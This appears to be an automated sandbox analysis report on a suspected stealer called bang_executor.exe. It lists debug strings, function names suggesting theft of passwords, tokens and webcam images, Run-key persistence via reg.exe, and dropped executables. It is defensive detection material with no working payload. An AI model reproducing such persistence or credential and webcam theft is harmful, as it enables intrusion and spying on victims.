          Source: Binary string: System.Xml.ni.pdbRSDS# source: WERF485.tmp.dmp.34.dr, WERB598.tmp.dmp.26.dr, WERB52A.tmp.dmp.25.dr, WERD313.tmp.dmp.30.dr
          Source: Binary string: System.Core.ni.pdb source: WERF485.tmp.dmp.34.dr, WERB598.tmp.dmp.26.dr, WERB52A.tmp.dmp.25.dr, WERD313.tmp.dmp.30.dr
          Source: Binary string: System.Web.Extensions.pdbMZ source: WERB598.tmp.dmp.26.dr
          Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbE source: bang_executor.exe, 0000001C.00000002.1780864823.0000013526228000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb*' source: bang_executor.exe, 00000020.00000002.1823246822.0000021D7B5A9000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Web.Extensions.pdb source: WERF485.tmp.dmp.34.dr, WERB598.tmp.dmp.26.dr, WERB52A.tmp.dmp.25.dr, WERD313.tmp.dmp.30.dr
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: bang_executor.exe, 00000003.00000002.1778857723.0000023079B4F000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 0000001C.00000002.1780864823.00000135261E8000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1823246822.0000021D7B5A9000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\mscorlib.pdb& source: bang_executor.exe, 00000003.00000002.1778857723.0000023079B74000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb&$ source: bang_executor.exe, 00000020.00000002.1823246822.0000021D7B5A9000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: mscorlib.ni.pdb source: WERF485.tmp.dmp.34.dr, WERB598.tmp.dmp.26.dr, WERB52A.tmp.dmp.25.dr, WERD313.tmp.dmp.30.dr
          Source: Binary string: bang_executor.PDB` source: bang_executor.exe, 00000020.00000002.1821242372.000000E666FF1000.00000004.00000010.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\mscorlib.pdb source: bang_executor.exe, 00000013.00000002.1766943002.0000023BA08E4000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 0000001C.00000002.1780864823.0000013526228000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1823246822.0000021D7B567000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.PDBpF source: bang_executor.exe, 00000003.00000002.1774187297.000000D1E65F1000.00000004.00000010.00020000.00000000.sdmp
          Source: Binary string: System.Web.Extensions.pdb??\p= source: WERF485.tmp.dmp.34.dr
          Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb\ source: bang_executor.exe, 00000013.00000002.1766943002.0000023BA0947000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: mscorlib.pdbL source: bang_executor.exe, 0000001C.00000002.1780864823.000001352626C000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: b77a5c561934e089\mscorlib.pdb, source: bang_executor.exe, 00000013.00000002.1765074697.000000D6E83F1000.00000004.00000010.00020000.00000000.sdmp
          Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERF485.tmp.dmp.34.dr, WERB598.tmp.dmp.26.dr, WERB52A.tmp.dmp.25.dr, WERD313.tmp.dmp.30.dr
          Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb source: bang_executor.exe, 00000003.00000002.1778857723.0000023079BB4000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 0000001C.00000002.1780864823.000001352626C000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1823246822.0000021D7B5A9000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\symbols\dll\System.pdbb source: bang_executor.exe, 00000003.00000002.1778857723.0000023079BB4000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: bang_executor.exe
          Source: Binary string: C:\Windows\System.pdbpdbtem.pdb/ source: bang_executor.exe, 0000001C.00000002.1780864823.0000013526228000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Xml.ni.pdb source: WERF485.tmp.dmp.34.dr, WERB598.tmp.dmp.26.dr, WERB52A.tmp.dmp.25.dr, WERD313.tmp.dmp.30.dr
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb& source: bang_executor.exe, 0000001C.00000002.1780864823.00000135261E8000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.PDB source: bang_executor.exe, 00000003.00000002.1774187297.000000D1E65F1000.00000004.00000010.00020000.00000000.sdmp, bang_executor.exe, 00000013.00000002.1765074697.000000D6E83F1000.00000004.00000010.00020000.00000000.sdmp, bang_executor.exe, 0000001C.00000002.1778245154.0000000A2B5F1000.00000004.00000010.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1821242372.000000E666FF1000.00000004.00000010.00020000.00000000.sdmp
          Source: Binary string: C:\Windows\System.pdbpdbtem.pdb source: bang_executor.exe, 00000013.00000002.1766943002.0000023BA0947000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1823246822.0000021D7B567000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.ni.pdbRSDS source: WERF485.tmp.dmp.34.dr, WERB598.tmp.dmp.26.dr, WERB52A.tmp.dmp.25.dr, WERD313.tmp.dmp.30.dr
          Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb| source: bang_executor.exe, 00000013.00000002.1766943002.0000023BA0947000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb_ source: bang_executor.exe, 0000001C.00000002.1780864823.0000013526228000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: bang_executor.PDB@ source: bang_executor.exe, 0000001C.00000002.1778245154.0000000A2B5F1000.00000004.00000010.00020000.00000000.sdmp
          Source: Binary string: System.Configuration.ni.pdb source: WERF485.tmp.dmp.34.dr, WERB598.tmp.dmp.26.dr, WERB52A.tmp.dmp.25.dr, WERD313.tmp.dmp.30.dr
          Source: Binary string: b77a5c561934e089\mscorlib.pdb>w0 source: bang_executor.exe, 00000003.00000002.1774187297.000000D1E65F1000.00000004.00000010.00020000.00000000.sdmp
          Source: Binary string: System.Configuration.pdb source: WERF485.tmp.dmp.34.dr, WERB598.tmp.dmp.26.dr, WERB52A.tmp.dmp.25.dr, WERD313.tmp.dmp.30.dr
          Source: Binary string: \??\C:\Windows\System.pdb source: bang_executor.exe, 00000003.00000002.1778857723.0000023079B74000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 00000013.00000002.1766943002.0000023BA08E4000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 0000001C.00000002.1780864823.0000013526228000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1823246822.0000021D7B567000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Xml.pdb source: WERF485.tmp.dmp.34.dr, WERB598.tmp.dmp.26.dr, WERB52A.tmp.dmp.25.dr, WERD313.tmp.dmp.30.dr
          Source: Binary string: System.pdb source: bang_executor.exe, 00000013.00000002.1766943002.0000023BA0947000.00000004.00000020.00020000.00000000.sdmp, WERF485.tmp.dmp.34.dr, WERB598.tmp.dmp.26.dr, WERB52A.tmp.dmp.25.dr, WERD313.tmp.dmp.30.dr
          Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.PDB source: bang_executor.exe, 00000003.00000002.1778857723.0000023079BA7000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 00000013.00000002.1766943002.0000023BA0947000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 0000001C.00000002.1780864823.000001352625A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\mscorlib.pdbj source: bang_executor.exe, 00000003.00000002.1778857723.0000023079B74000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\dll\System.pdb source: bang_executor.exe, 00000003.00000002.1778857723.0000023079B74000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 00000013.00000002.1766943002.0000023BA0947000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 0000001C.00000002.1780864823.0000013526228000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1823246822.0000021D7B567000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: mscorlib.pdb source: WERF485.tmp.dmp.34.dr, WERB598.tmp.dmp.26.dr, WERB52A.tmp.dmp.25.dr, WERD313.tmp.dmp.30.dr
          Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: bang_executor.exe, 00000003.00000002.1778857723.0000023079BB4000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 00000013.00000002.1766943002.0000023BA0947000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 0000001C.00000002.1780864823.000001352626C000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1823246822.0000021D7B5A9000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb8 source: bang_executor.exe, 00000013.00000002.1766943002.0000023BA08E4000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: bang_executor.exe, 00000003.00000002.1778857723.0000023079B4F000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 00000013.00000002.1766943002.0000023BA08E4000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1823246822.0000021D7B5A9000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Core.pdb source: WERF485.tmp.dmp.34.dr, WERB598.tmp.dmp.26.dr, WERB52A.tmp.dmp.25.dr, WERD313.tmp.dmp.30.dr
          Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb3 source: bang_executor.exe, 0000001C.00000002.1780864823.0000013526228000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Core.pdb@k source: WERF485.tmp.dmp.34.dr
          Source: Binary string: bang_executor.PDB source: bang_executor.exe, 00000003.00000002.1774187297.000000D1E65F1000.00000004.00000010.00020000.00000000.sdmp, bang_executor.exe, 00000013.00000002.1765074697.000000D6E83F1000.00000004.00000010.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb- source: bang_executor.exe, 0000001C.00000002.1780864823.00000135261E8000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: pC:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.PDB source: bang_executor.exe, 00000003.00000002.1774187297.000000D1E65F1000.00000004.00000010.00020000.00000000.sdmp, bang_executor.exe, 00000013.00000002.1765074697.000000D6E83F1000.00000004.00000010.00020000.00000000.sdmp, bang_executor.exe, 0000001C.00000002.1778245154.0000000A2B5F1000.00000004.00000010.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1821242372.000000E666FF1000.00000004.00000010.00020000.00000000.sdmp
          Source: Binary string: System.pdb< source: bang_executor.exe, 00000020.00000002.1823246822.0000021D7B5A9000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbicy source: bang_executor.exe, 00000020.00000002.1823246822.0000021D7B567000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Web.Extensions.pdbpHp source: WERB52A.tmp.dmp.25.dr
          Source: Binary string: indoC:\Windows\mscorlib.pdb source: bang_executor.exe, 00000003.00000002.1774187297.000000D1E65F1000.00000004.00000010.00020000.00000000.sdmp, bang_executor.exe, 00000013.00000002.1765074697.000000D6E83F1000.00000004.00000010.00020000.00000000.sdmp, bang_executor.exe, 0000001C.00000002.1778245154.0000000A2B5F1000.00000004.00000010.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1821242372.000000E666FF1000.00000004.00000010.00020000.00000000.sdmp
          Source: Binary string: System.ni.pdb source: WERF485.tmp.dmp.34.dr, WERB598.tmp.dmp.26.dr, WERB52A.tmp.dmp.25.dr, WERD313.tmp.dmp.30.dr
          Source: Binary string: System.Core.ni.pdbRSDS source: WERF485.tmp.dmp.34.dr, WERB598.tmp.dmp.26.dr, WERB52A.tmp.dmp.25.dr, WERD313.tmp.dmp.30.dr
          Source: bang_executor.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: bang_executor.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: bang_executor.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: bang_executor.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: bang_executor.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

          Data Obfuscation

          barindex
          .NET source code contains potential unpacker
          Source: bang_executor.exe.0.dr, Program.cs.Net Code: LoadDll System.Reflection.Assembly.Load(byte[])
          Source: bang_executor.exe.0.dr, Program.cs.Net Code: password
          Source: bang_executor.exe.0.dr, Program.cs.Net Code: webcampic
          Source: bang_executor.exe.0.dr, Program.cs.Net Code: select_cam
          Source: bang_executor.exe.0.dr, Program.cs.Net Code: get_cams
          Source: bang_executor.exe.0.dr, Program.cs.Net Code: get_tokens
          Source: bang_executor.exe.0.drStatic PE information: 0xD6D709DC [Mon Mar 20 18:56:28 2084 UTC]
          Source: C:\Users\user\Desktop\bang_executor.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\__tmp_rar_sfx_access_check_4302656Jump to behavior
          Source: bang_executor.exeStatic PE information: section name: .didat
          Source: C:\Users\user\Desktop\bang_executor.exeCode function: 0_2_0050125A push ecx; ret 0_2_0050126D
          Source: C:\Users\user\Desktop\bang_executor.exeCode function: 0_2_00501DB0 push ecx; ret 0_2_00501DC3

          Persistence and Installation Behavior

          barindex
          Uses cmd line tools excessively to alter registry or file data
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
          Source: C:\Users\user\Desktop\bang_executor.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeJump to dropped file
          Source: C:\Users\user\Desktop\bang_executor.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeJump to dropped file
          Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bang_executorJump to behavior
          Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bang_executorJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
          Source: C:\Users\user\Desktop\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
